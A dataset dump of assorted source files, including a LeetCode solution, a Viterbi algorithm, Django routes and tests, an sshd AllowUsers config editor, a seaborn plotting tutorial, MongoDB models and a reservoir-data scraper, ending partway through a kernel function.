+{"seq_id":"45263101","text":"#\n# @lc app=leetcode id=949 lang=python3\n#\n# [949] Largest Time for Given Digits\n#\nclass Solution:\n def largestTimeFromDigits(self, A):\n A.sort()\n for h in range(23, -1, -1):\n for m in range(59, -1, -1):\n t = [int(h / 10), h % 10, int(m / 10), m % 10]\n ts = sorted(t)\n if ts == A:\n return str(t[0]) + str(t[1]) + \":\" + str(t[2]) + str(t[3])\n return \"\"\n","sub_path":"leetcode/949.largest-time-for-given-digits.py","file_name":"949.largest-time-for-given-digits.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42371184","text":"import pandas as pd\nimport os\nimport numpy as np\nimport xlsxwriter\n\n\n\nall_df_list = []\n\ncwd = os.path.abspath('')\nfiles = os.listdir(cwd)\nwriter = pd.ExcelWriter(cwd + '//Sorted_Stocks.xlsx', engine = 'xlsxwriter')\ncounter = 0\n\nfor file in files:\n if file.endswith ('.csv'):\n all_df_list.append(pd.read_csv(file))\n if(len(all_df_list) > 50):\n counter = counter + 1\n appended_df = pd.concat(all_df_list)\n appended_df.to_excel(writer, sheet_name = 'Set' + str(counter))\n all_df_list = []\n\nwriter.save()\nwriter.close()\n\n#appended_df.to_excel(\"Sorted_Stocks.xlsx\", index=False)\n","sub_path":"Sorter2.py","file_name":"Sorter2.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"491321470","text":"# 输入 八进制 值\nx = str(input(\"请输入需要转换的数据:\"))\n# 八进制 与 二进制 转换关系\ndict1 = {\"0\":\"000\",\n \"1\":\"001\",\n \"2\":\"010\",\n \"3\":\"011\",\n \"4\":\"100\",\n \"5\":\"101\",\n \"6\":\"110\",\n \"7\":\"111\",\n}\nlist1 = []\nlist2 = []\n# 将 x 值拆分并传入 数组list1 中\nlist1.extend(x)\n# 循环遍历\nfor i in list1:\n # 将 字典dict1 中对应值传入 数组list2 中\n list2.append(dict1.get(i))\n# 数组 转换成 字符串\nstr1 = ''.join(list2)\n# 打印 二进制 输出值\nprint(int(str1))\n\n","sub_path":"SmallProgram/demo07.py","file_name":"demo07.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445377564","text":"import numpy as np\r\n\r\n\r\ndef run_viterbi(emission_scores, trans_scores, start_scores, end_scores):\r\n \"\"\"Run the Viterbi algorithm.\r\n\r\n N - number of tokens (length of sentence)\r\n L - number of labels\r\n\r\n As an input, you are given:\r\n - Emission scores, as an NxL array - score[token][label]\r\n - Transition scores (Yp -> Yc), as an LxL array\r\n - Start transition scores (S -> Y), as an Lx1 array\r\n - End transition scores (Y -> E), as an Lx1 array\r\n\r\n You have to return a tuple (s,y), where:\r\n - s is the score of the best sequence\r\n - y is the size N array/seq of integers representing the best sequence.\r\n \"\"\"\r\n L = start_scores.shape[0]\r\n assert end_scores.shape[0] == L\r\n assert trans_scores.shape[0] == L\r\n assert trans_scores.shape[1] == L\r\n assert emission_scores.shape[1] == L\r\n N = emission_scores.shape[0]\r\n\r\n y = [] # score table\r\n sequence = [0]*N # final sequence\r\n bp = [] # backpointers\r\n # init table, N rows and L columns\r\n for i in range(N):\r\n y.append([0]*L)\r\n\r\n # init backpointer table, N-1 rows, L columns\r\n for i in range(N-1):\r\n bp.append([0]*L)\r\n\r\n for i in range(N):\r\n for y_i in range(L):\r\n max_score = float(\"-inf\")\r\n for y_prev in range(L):\r\n score = 0\r\n if i == 0: # if first token, use start transition\r\n # note, previous score is zero\r\n score = emission_scores[i][y_i] + start_scores[y_i]\r\n else: # else lookup transition score in table\r\n score = emission_scores[i][y_i] + trans_scores[y_prev][y_i] + y[i-1][y_prev]\r\n \r\n if score > max_score:\r\n max_score = score\r\n if i > 0: # update backpointer table\r\n bp[i-1][y_i] = y_prev\r\n y[i][y_i] = max_score \r\n\r\n final_score = float(\"-inf\")\r\n for y_end in range(L): # consider end transition scores, assume zero emission for eos\r\n # y_end is the label of the last token\r\n score = end_scores[y_end] + y[N-1][y_end]\r\n if score > final_score: \r\n final_score = score\r\n sequence[-1] = y_end\r\n\r\n # build sequence:\r\n for i in range(-1, -N, -1):\r\n sequence[i-1] = bp[i][sequence[i]]\r\n\r\n # score set to 0\r\n return (final_score, sequence)","sub_path":"hw3/viterbi.py","file_name":"viterbi.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"356722416","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom Users import views\nfrom . import views as betting_app_views\n\nurlpatterns = [\n\n ##############################\n # Admin\n ##############################\n url(r'^admin/', include(admin.site.urls)),\n\n ##############################\n # Accounts\n ##############################\n url(r'^$', betting_app_views.index, name='index'),\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^register/$', views.register, name='register'),\n\n ##############################\n # Search\n ##############################\n url(r'^search/$', views.search_redirect, name='search_redirect'),\n url(r'^search-home/$', views.search_home, name='search_home'),\n url(r'^search/(?P[a-zA-Z0-9]+)$', views.search, name='search'),\n\n ##############################\n # User\n ##############################\n url(r'^me/$', views.me, name='me'),\n url(r'^notifications/$', views.notifications, name='notifications'),\n url(r'^requests/$', views.friend_requests, name='requests'),\n url(r'^friends/$', views.friends, name='friends'),\n url(r'^new-bet-user/$', views.new_bet_user, name='new-bet-user'),\n url(r'^new-bet/$', views.new_bet, name='new-bet'),\n url(r'^bets/$', views.bets, name='bets'),\n url(r'^bets/(?P[\\w\\W]+)/$', views.bets_title, name='bets_title'),\n url(r'^(?P[\\w]+)/', include('Users.urls')),\n\n\n]\n","sub_path":"betting_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352006743","text":"#!/usr/bin/env python3\n\nimport logging\nimport os\nimport re\nimport sys\nimport tempfile\nfrom shutil import move\n\nfrom api2sshallowedusers.helpers import Command\n\nlogger = logging.getLogger(__name__)\n\n\ndef find_daemon():\n if Command('systemd', 'sshd').check():\n return Command('systemd', 'sshd')\n elif Command('init', 'ssh').check():\n return Command('init', 'ssh')\n elif Command('init', 'sshd').check():\n return Command('init', 'sshd')\n else:\n logger.error('is sshd running ? (i can only reload)')\n logger.error('exiting..')\n sys.exit(1)\n\n\nclass SSHConfig(object):\n def __init__(self, file):\n\n self.sshd = find_daemon()\n self.users = []\n self.restricted_users = False\n self.regex_users = re.compile('^AllowUsers (\\w+ ?)*$')\n\n try:\n self.filename = os.path.abspath(file)\n logger.info('using ssh config file : %s' % self.filename)\n with open(self.filename, 'r+'):\n pass\n except PermissionError:\n logger.error('cant open file for modifications, exiting..')\n sys.exit(1)\n except FileNotFoundError:\n logger.error('cant find file, exiting..')\n sys.exit(1)\n\n with open(self.filename, 'r') as f:\n for line in f:\n if self.regex_users.match(line):\n self.users = line.split()\n self.users.remove('AllowUsers')\n self.restricted_users = True\n\n logger.info('users: %s' % self.users)\n\n def add_user(self, user):\n if user not in self.users:\n logger.info('adding user %s' % user)\n self.users.append(user)\n return self.commit()\n return False\n\n def del_user(self, user):\n if user in self.users:\n logger.info('removing user %s' % user)\n self.users.remove(user)\n return self.commit()\n return False\n\n def commit(self):\n new_config, new_config_name = tempfile.mkstemp(dir=os.getcwd())\n with open(new_config, 'w') as new:\n with open(self.filename, 'r') as old:\n for line in old:\n if self.regex_users.match(line):\n new.write('AllowUsers {users}\\n'.format(\n users=' '.join(self.users)))\n else:\n new.write(line)\n if not self.restricted_users:\n new.write('AllowUsers {users}\\n'.format(\n users=' '.join(self.users)))\n self.restricted_users = True\n try:\n move(new_config_name, self.filename)\n except Exception:\n logger.error('cant write new sshd_config file')\n return False\n return True\n","sub_path":"api2sshallowedusers/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"297444507","text":"import pandas as pd\nimport seaborn as sns\nimport numpy as np\n\n\n######################################################################\n### Plotting with relative data #\n######################################################################\ntips = pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/tips.csv\")\nsns.set()\n\nsns.load_dataset(\"tips\")\n\n# print(tips.get(\"total_bill\"))\n\nsns.relplot(x=\"total_bill\",\n y=\"tip\",\n col=\"time\",\n hue=\"smoker\",\n size=\"size\",\n style=\"smoker\",\n data=tips)\nsns.relplot(x=\"total_bill\", y=\"tip\", size=\"size\", sizes=(15, 200), data=tips);\n\n\n#prepare a dataframe and plot using lineplot\ndf = pd.DataFrame(time=np.arange(500),\n value=np.random.randn().cumsum())\ng=sns.relplot(x=\"time\",y=\"value\",kind=\"line\",data=df)\ng.fig.autofmt_xdate()\n\n#disable the default sort\ndf = pd.DataFrame(np.random.randn(500, 2).cumsum(axis=0),\n columns=[\"x\", \"y\"])\nsns.relplot(x=\"x\", y=\"y\", sort=False, kind=\"line\", data=df);\n\nfmri = sns.load_dataset(\"fmri\")\nsns.relplot(x=\"timepoint\", y=\"signal\", kind=\"line\", data=fmri);\n\n#Without confidence interval\nfmri = sns.load_dataset(\"fmri\")\nsns.relplot(x=\"timepoint\", y=\"signal\", kind=\"line\", data=fmri,ci=None);\n\nsns.relplot(x=\"timepoint\", y=\"signal\", estimator=None, kind=\"line\", data=fmri);\n\n#to turn off the estimator\nsns.relplot(x=\"timepoint\", y=\"signal\", estimator=None, kind=\"line\", data=fmri);\n\nsns.relplot(x=\"timepoint\", y=\"signal\", hue=\"event\", kind=\"line\", data=fmri);\n\n#to plot markers for identification of subset\nsns.relplot(x=\"timepoint\",y=\"signal\",hue=\"region\",style=\"event\",dashes=False,markers=True,kind=\"line\",data=fmri)\n\nemp_df = pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/employee.csv\")\nprint(emp_df)\n\nsns.relplot(x=\"empdeptname\",y=\"empsalary\",hue=\"empdeptname\",style=\"empdeptname\",kind=\"scatter\",data=emp_df)\n\nsns.relplot(x=\"timepoint\", y=\"signal\", hue=\"region\",\n units=\"subject\", estimator=None,\n kind=\"line\", data=fmri.query(\"event == 'stim'\"));\n\ndots = pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/dots.csv\")\n\nprint(dots)\n\nsns.relplot(x=\"time\",y=\"firing_rate\",hue=\"coherence\",style=\"choice\",kind=\"line\",data=dots)\n\n\n##changing the color of the data presentation\npalette = sns.cubehelix_palette(light=.8, n_colors=10)\nsns.relplot(x=\"time\",\n y=\"firing_rate\",\n hue=\"coherence\",\n style=\"choice\",\n kind=\"line\",\n palette=palette,\n data=dots)\n\n##use size to increase the visibility of the lines plotted\nsns.relplot(x=\"timepoint\", y=\"signal\", hue=\"subject\",\n col=\"region\", row=\"event\", height=3,\n kind=\"line\", estimator=None, data=fmri);\n\n#plot multiple facets/graph based on column and number of individual graphs\nsns.relplot(x=\"timepoint\", y=\"signal\", hue=\"event\", style=\"event\",\n col=\"subject\", col_wrap=5,\n height=3, aspect=.50, linewidth=2.5,\n kind=\"line\", data=fmri.query(\"region == 'frontal'\"));\n\n\n######################################################################\n### Plotting with categorical data #\n######################################################################\n# Categorical scatterplots:\n# stripplot() (with kind=\"strip\"; the default)\n# swarmplot() (with kind=\"swarm\")\n# Categorical distribution plots:\n# boxplot() (with kind=\"box\")\n# violinplot() (with kind=\"violin\")\n# boxenplot() (with kind=\"boxen\")\n# Categorical estimate plots:\n# pointplot() (with kind=\"point\")\n# barplot() (with kind=\"bar\")\n# countplot() (with kind=\"count\")\nimport matplotlib.pyplot as plt\nsns.set(style=\"ticks\",color_codes=True)\ntips=pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/tips.csv\")\n\nprint(tips)\nsns.catplot(x=\"day\",y=\"tip\",data=tips)\nsns.catplot(x=\"day\",y=\"tip\",jitter=False,data=tips)\n\n##beesswarn by setting kind=\"swarm\"\nsns.catplot(x=\"day\",y=\"tip\",kind=\"swarm\",data=tips)\nsns.catplot(x=\"day\",y=\"tip\",kind=\"swarm\",hue=\"smoker\",data=tips.query(\"day=='Sun'\"))\n\n#order the x-axis elements usig list\nsns.catplot(x=\"day\", y=\"tip\", order=[\"Sun\",\"Mon\",\"Tue\",\"Wed\",\"Thur\",\"Fri\",\"Sat\"], data=tips);\n\n#When the data is clumpsy and we need to represent on the graph use box scatter option\nsns.catplot(x=\"day\", y=\"tip\", kind=\"box\", data=tips);\n\n##Use different kind\nsns.catplot(x=\"day\", y=\"tip\", kind=\"strip\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\nsns.catplot(x=\"day\", y=\"tip\", kind=\"violin\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\nsns.catplot(x=\"day\", y=\"tip\", kind=\"boxen\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\nsns.catplot(x=\"day\", y=\"tip\", kind=\"point\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\nsns.catplot(x=\"day\", y=\"tip\", kind=\"bar\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\n\n# for count we need to set one of the axis as None\nsns.catplot(x=\"day\", y=None, kind=\"count\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\n\n##Boxen plot\n##load the diamond dataset\ndiamonds=pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/diamonds.csv\")\nsns.load_dataset(diamonds)\nsns.catplot(x=\"color\",y=\"price\",kind=\"boxen\",data=diamonds.sort_values(\"color\"));\nsns.catplot(x=\"cut\",y=\"price\",kind=\"boxen\",data=diamonds.sort_values(\"color\"));\n\n##palette = pastel is to reduce the color intensity and inner stick is to mark the widht length\n## split=True splits based on the hue part\nsns.catplot(x=\"day\", y=\"total_bill\", hue=\"sex\",\n kind=\"violin\", inner=\"stick\", split=True,\n palette=\"pastel\", data=tips);\n\n## Using barplot to plot the bars instead of scatterplot and swarmplot\ntitanic=sns.load_dataset(\"titanic\")\nsns.catplot(x=\"sex\",y=\"survived\",hue=\"class\",kind=\"bar\",data=titanic)\n\n##Violinplot\nsns.violinplot(x=\"day\",y=\"total_bill\",data=tips)\n\n######################################################################\n### Plotting distribution of a dataset #\n######################################################################\n##For univariate we can use kdeplot and for bivariate we can use kdeplot,joinplot and pairplot\n## to plot the relationship between variables\nx=np.random.normal(4,2,size=40)\nsns.kdeplot(x,shade=True,kernel=\"gau\",bw=\"scott\",gridsize=100,cut=3,clip=None,legend=True)\nsns.kdeplot(x,bw=0.2,label=\"bw:0.2\")\n\n##bandwidth shows the estimation with respect to the smallest and largest values in the dataset\n\nx=np.random.gamma(6,2,200)\nsns.distplot(x,kde=False)\n\nmean, cov = [0, 1], [(1, .5), (.5, 1)]\ndata = np.random.multivariate_normal(mean, cov, 200)\ndf = pd.DataFrame(data, columns=[\"x\", \"y\"])\n\nsns.scatterplot(x=\"x\",y=\"y\",data=df)\nsns.jointplot(x=\"x\",y=\"y\",data=df)\n\nx, y = np.random.multivariate_normal(mean, cov, 1000).T\n#style must be one of white, dark, whitegrid, darkgrid, ticks\nwith sns.axes_style(\"white\"):\n sns.jointplot(x=x, y=y, kind=\"hex\", color=\"k\");\n\nsns.jointplot(x=\"x\",y=\"y\",data=df,kind=\"kde\")\n\nf, ax = plt.subplots(figsize=(6, 6))\ncmap = sns.cubehelix_palette(as_cmap=True, dark=0, light=1, reverse=True)\nsns.kdeplot(df.x, df.y, cmap=cmap, n_levels=60, shade=True);\n\niris=sns.load_dataset(\"iris\")\nsns.pairplot(iris)\n\nsns.pairplot(iris,hue=\"species\")\n\n##Analysing the data using linear model and regression model techniques\n## methods used here are lmplot() and regplot()\nsns.lmplot(x=\"total_bill\",y=\"tip\",hue=\"smoker\",data=tips)\n\nsns.lmplot(x=\"size\",y=\"tip\",data=tips,x_estimator=np.mean)\n\nanscombe=sns.load_dataset(\"sns\")\nsns.lmplot(x=\"x\", y=\"y\", data=anscombe.query(\"dataset == 'I'\"),\n ci=None, scatter_kws={\"s\": 80});\n\n##User defined dataframe\nemp_df=pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/employee.csv\")\nsns.lmplot(x=\"empid\",y=\"empsalary\",hue=\"empdeptname\",data=emp_df)\n\n#residplot\nsns.residplot(x=\"x\", y=\"y\", data=anscombe.query(\"dataset == 'I'\"),\n scatter_kws={\"s\": 80});\n\n##Creating multi plot grids\ntips=sns.load_dataset(\"tips\")\n#Below line creates the empty graph\ng=sns.FacetGrid(tips,col=\"time\")\n\n#Below line plots the Facetgrid on to the graph\ng.map(plt.hist,\"tip\")\n\ng=sns.FacetGrid(tips,col=\"time\",hue=\"smoker\")\ng.map(plt.hist,\"tip\")\n\n\ng=sns.FacetGrid(tips,col=\"time\",hue=\"smoker\")\ng.map(plt.scatter,\"total_bill\",\"tip\",alpha=.7)\n\ng=sns.FacetGrid(data=tips,row=\"smoker\",col=\"time\",margin_titles=True)\ng.map(sns.regplot,\"total_bill\",\"tip\",color=\".3\",fit_reg=False,x_jitter=.1)\n\npal = dict(Lunch=\"seagreen\", Dinner=\"gray\")\ng = sns.FacetGrid(tips, hue=\"time\", palette=pal, height=5)\ng.map(plt.scatter, \"total_bill\", \"tip\", s=50, alpha=.7, linewidth=.5, edgecolor=\"white\")\n\n\n##Changing the content of the x and y axis\nwith sns.axes_style(\"white\"):\n g = sns.FacetGrid(tips, row=\"sex\", col=\"smoker\", margin_titles=True, height=2.5)\ng.map(plt.scatter, \"total_bill\", \"tip\", color=\"#334488\", edgecolor=\"white\", lw=.5);\ng.set_axis_labels(\"Total bill (US Dollars)\", \"Tip\");\ng.set(xticks=[10, 30, 50], yticks=[2, 6, 10]);\ng.fig.subplots_adjust(wspace=.02, hspace=.02);\n\n","sub_path":"Libraries/seaborn_library/seaborn_lib.py","file_name":"seaborn_lib.py","file_ext":"py","file_size_in_byte":9262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"173394537","text":"from enum import unique\nfrom utilities import AppContext\nfrom db import get_db\nfrom anuvaad_auditor.loghandler import log_info, log_exception\nimport pymongo\nfrom config import MONGO_s3_LINK_STORE\n\nDB_SCHEMA_NAME = 'file_content'\n\nclass BlockModel(object):\n def __init__(self):\n collections = get_db()[DB_SCHEMA_NAME]\n try:\n collections.create_index('record_id')\n except pymongo.errors.DuplicateKeyError as e:\n log_info(\"duplicate key, ignoring\", AppContext.getContext())\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n \n try:\n ref_repo = get_db()[MONGO_s3_LINK_STORE]\n ref_repo.create_index('job_id',unique=True)\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n \n def update_block(self, record_id, user_id, block_identifier, block):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.update({'$and': [{'record_id': record_id}, {'created_by': user_id}, { 'block_identifier': block_identifier }]},\n { '$set': block }, upsert=True)\n\n if 'writeError' in list(results.keys()):\n return False\n return True\n\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return False\n\n def store_bulk_blocks(self, blocks):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.insert_many(blocks)\n if len(blocks) == len(results.inserted_ids):\n return True\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return False\n\n def get_all_blocks(self, user_id, record_id):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n docs = collections.find({\n 'record_id': record_id,\n 'created_by': user_id\n })\n return docs\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return False\n \n\n def get_blocks_by_page(self, record_id, page_number):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.aggregate([\n { '$match' : {'page_no': page_number,'record_id': record_id} },\n { '$group': { '_id': '$data_type', 'data': { '$push': \"$data\" } } }\n ])\n return results\n except Exception as e:\n AppContext.addRecordID(record_id)\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return False\n\n def get_block_by_block_identifier(self, record_id, user_id, block_identifier):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.aggregate([\n { '$match' : {'record_id': record_id, 'block_identifier': block_identifier, 'created_by': user_id } },\n { '$group': { '_id': '$data_type', 'data': { '$push': \"$data\" } } }\n ])\n return results\n except Exception as e:\n log_exception('db connection exception ', AppContext.getContext(), e)\n return None\n\n def get_document_total_page_count(self, record_id):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.aggregate([\n { '$match' : { 'record_id': record_id } },\n {\n '$group':\n {\n '_id': '$record_id',\n 'page_count': { '$max': \"$page_no\" }\n }\n }\n ])\n\n count = 0\n for result in results:\n count = result['page_count']\n break\n\n return count\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return 0\n\n def store_s3_link(self, data):\n try:\n collections = get_db()[MONGO_s3_LINK_STORE]\n record = collections.find({\"job_id\":data[\"job_id\"]})\n # if record.count() == 0:\n if record.count() != 0:\n print(True)\n collections.update_one({'job_id': data['job_id']},\n { '$set': { \"file_link.parallel_doc\" : data['file_link']['parallel_doc']} })\n else:\n print(False)\n collections.insert(data)\n \n except Exception as e:\n log_exception(\"db connection exception |{}\".format(str(e)), AppContext.getContext(), e)\n return False\n\n def get_s3_link(self, job_id):\n try:\n collections = get_db()[MONGO_s3_LINK_STORE]\n result = collections.find({\"job_id\":job_id},{\"_id\":0})\n return result[0]\n except Exception as e:\n log_exception(\"db connection exception |{}\".format(str(e)), AppContext.getContext(), e)\n return False","sub_path":"anuvaad-etl/anuvaad-extractor/content-handler/src/models/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533660014","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 15 18:14:48 2016\n\n@author: escriva\n\"\"\"\n\n\"\"\"\nSELECTED CDEC SENSOR NUMBERS (these are not be available for all sites):\n 1 river stage [ft]\n 2 precipitation, accumulated [in]\n 3 SWE [in]\n 4 air temperature [F]\n 5 EC [ms/cm]\n 6 reservoir elevation [ft]\n 7 reservoir scheduled release [cfs]\n 8 full natural flow [cfs]\n 15 reservoir storage [af]\n 20 flow -- river discharge [cfs]\n 22 reservoir storage change [af]\n 23 reservoir outflow [cfs]\n 24 Evapotranspiration [in]\n 25 water temperature [F]\n 27 water turbidity [ntu]\n 28 chlorophyll [ug/l]\n 41 flow -- mean daily [cfs]\n 45 precipitation, incremental [in]\n 46 runoff volume [af]\n 61 water dissolved oxygen [mg/l]\n 62 water pH value [pH]\n 64 pan evaporation (incremental) [in]\n 65 full natural flow [af]\n 66 flow -- monthly volume [af]\n 67 accretions (estimated) [af]\n 71 spillway discharge [cfs]\n 74 lake evaporation (computed) [cfs]\n 76 reservoir inflow [cfs]\n 85 control regulating discharge [cfs]\n 94 top conservation storage (reservoir) [af]\n 100 water EC [us/cm]\n CDEC DURATION CODES:\n E event\n H hourly\n D daily\n M monthly\n\"\"\"\nimport ScrappingWater as sw\nimport pandas as pd\n\nlist = ['MIL', 'BUC', 'MAR', 'BAR', 'BUR', 'EXC', 'DNP', 'NML', 'CMN']\n\nresults=[]\n\nfor reservoir in list:\n df = sw.get_CDEC_data(station_id=reservoir)\n dfsum = df[['01', '02', '03' , '04','05','06','07','08','09','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31']]\n dfsum = dfsum.convert_objects(convert_numeric=True)\n df['Total'] = dfsum.mean(axis=1)\n df['NANs'] = dfsum.isnull().values.sum(axis=1)\n df['Year']=df.iloc[:,2]\n df['Month']=df.iloc[:,3]\n df['Date']=pd.to_datetime(df.Year*10000+df.Month*100+1,format='%Y%m%d') \n df['Reservoir']=df.iloc[:,0]\n del dfsum\n dfshort = df[['Date','Total', 'NANs']]\n results.append(dfshort)\n del df\n \nfor i in range(9):\n results[i].to_csv(\"ReservoirResults\"+list[i]+\".csv\")\n results[i] = results[i].rename(columns={'Total':'Total'+list[i], 'Reservoir' : 'Reservoir'+list[i]})\n\"\"\" \na = results[0].merge(results[1],on='Date').merge(results[2],on='Date').merge(results[3],on='Date').merge(results[4],on='Date').merge(results[5],on='Date').merge(results[6],on='Date').merge(results[7],on='Date').merge(results[8],on='Date')\na.to_csv(\"ReservoirResultsMerged.csv\")\n\"\"\"","sub_path":"scrappingWithScript.py","file_name":"scrappingWithScript.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"54417430","text":"from unittest.mock import patch\nfrom intake.tests.base_testcases import IntakeDataTestCase\nfrom django.db.models import Count\nfrom user_accounts import models, exceptions\nfrom intake import models as intake_models\nfrom user_accounts.tests import mock\nfrom intake import constants\n\n\nclass TestOrganization(IntakeDataTestCase):\n\n fixtures = [\n 'counties',\n 'organizations', 'mock_profiles',\n 'mock_2_submissions_to_a_pubdef',\n 'mock_2_submissions_to_ebclc',\n 'mock_2_submissions_to_cc_pubdef',\n 'mock_2_submissions_to_sf_pubdef',\n 'mock_2_submissions_to_monterey_pubdef',\n 'mock_1_submission_to_multiple_orgs',\n 'mock_application_events',\n ]\n\n def test_has_a_pdf(self):\n self.assertTrue(self.sf_pubdef.has_a_pdf())\n self.assertFalse(self.cc_pubdef.has_a_pdf())\n\n def test_get_referral_emails_even_if_no_users(self):\n expected_email = \"foo@bar.net\"\n # we need an org\n org = models.Organization(name=\"Acme Nonprofit Services Inc.\")\n org.save()\n user = mock.fake_superuser()\n models.Invitation.create(\n expected_email,\n organization=org,\n inviter=user)\n emails = org.get_referral_emails()\n self.assertListEqual(emails, [expected_email])\n\n def test_get_referral_emails_raises_error_with_no_emails(self):\n org = models.Organization(name=\"Acme Nonprofit Services Inc.\")\n org.save()\n with self.assertRaises(exceptions.NoEmailsForOrgError):\n org.get_referral_emails()\n\n def test_get_transfer_org_returns_correct_org(self):\n ebclc = self.ebclc\n a_pubdef = self.a_pubdef\n self.assertEqual(ebclc.get_transfer_org(), a_pubdef)\n self.assertEqual(a_pubdef.get_transfer_org(), ebclc)\n\n def test_get_transfer_org_returns_none(self):\n sf_pubdef = self.sf_pubdef\n cc_pubdef = self.cc_pubdef\n self.assertIsNone(sf_pubdef.get_transfer_org())\n self.assertIsNone(cc_pubdef.get_transfer_org())\n\n def test_get_unopened_apps_returns_all_apps_if_no_open_events(self):\n ebclc = models.Organization.objects.get(\n slug=constants.Organizations.EBCLC)\n for org in models.Organization.objects.filter(\n is_receiving_agency=True):\n if org == ebclc:\n self.assertEqual(org.get_unopened_apps().count(), 2)\n else:\n self.assertEqual(org.get_unopened_apps().count(), 3)\n\n def test_get_unopened_apps_returns_apps_opened_by_other_org(self):\n # assume we have a multi-org app opened by a user from one org\n cc_pubdef = models.Organization.objects.get(\n slug=constants.Organizations.COCO_PUBDEF)\n a_pubdef = models.Organization.objects.get(\n slug=constants.Organizations.ALAMEDA_PUBDEF)\n cc_pubdef_user = models.UserProfile.objects.filter(\n organization=cc_pubdef).first().user\n sub = intake_models.FormSubmission.objects.annotate(\n org_count=Count('organizations')).filter(org_count__gte=3).first()\n intake_models.ApplicationLogEntry.log_opened([sub.id], cc_pubdef_user)\n # assert that it shows up in unopened apps\n self.assertIn(sub, a_pubdef.get_unopened_apps())\n self.assertNotIn(sub, cc_pubdef.get_unopened_apps())\n\n @patch('intake.models.ApplicationEvent.from_logs')\n def test_get_unopened_apps_with_deleted_opened_app_returns_expected_result(\n self, from_logs):\n # https://code.djangoproject.com/ticket/25467?cversion=0&cnum_hist=2\n logs = intake_models.ApplicationLogEntry.log_opened(\n [None], user=self.sf_pubdef_user)\n self.assertTrue(logs[0].id)\n self.assertIsNone(logs[0].submission_id)\n self.assertEqual(self.sf_pubdef.get_unopened_apps().count(), 3)\n","sub_path":"user_accounts/tests/models/test_organization.py","file_name":"test_organization.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"603935451","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nfrom future import standard_library\n\nimport numpy as np\n\nstandard_library.install_aliases()\n\n\ndef kernel_delta_norm(X_in_1, X_in_2):\n n_1 = X_in_1.shape[1]\n n_2 = X_in_2.shape[1]\n K = np.zeros((n_1, n_2))\n\n u_list = np.unique(X_in_1)\n for ind in u_list:\n ind_1 = (X_in_1 == ind)\n ind_2 = (X_in_2 == ind)\n idx = (ind_1 & ind_2.T)\n c_1 = np.sqrt(np.count_nonzero(ind_1))\n c_2 = np.sqrt(np.count_nonzero(ind_2))\n K[idx] = 1 / c_1 / c_2\n return K\n\n\ndef kernel_delta(X_in_1, X_in_2):\n n_1 = X_in_1.shape[1]\n n_2 = X_in_2.shape[1]\n K = np.zeros((n_1, n_2))\n u_list = np.unique(X_in_1)\n for ind in u_list:\n ind_1 = (X_in_1 == ind)\n ind_2 = (X_in_2 == ind)\n idx = (ind_1 & 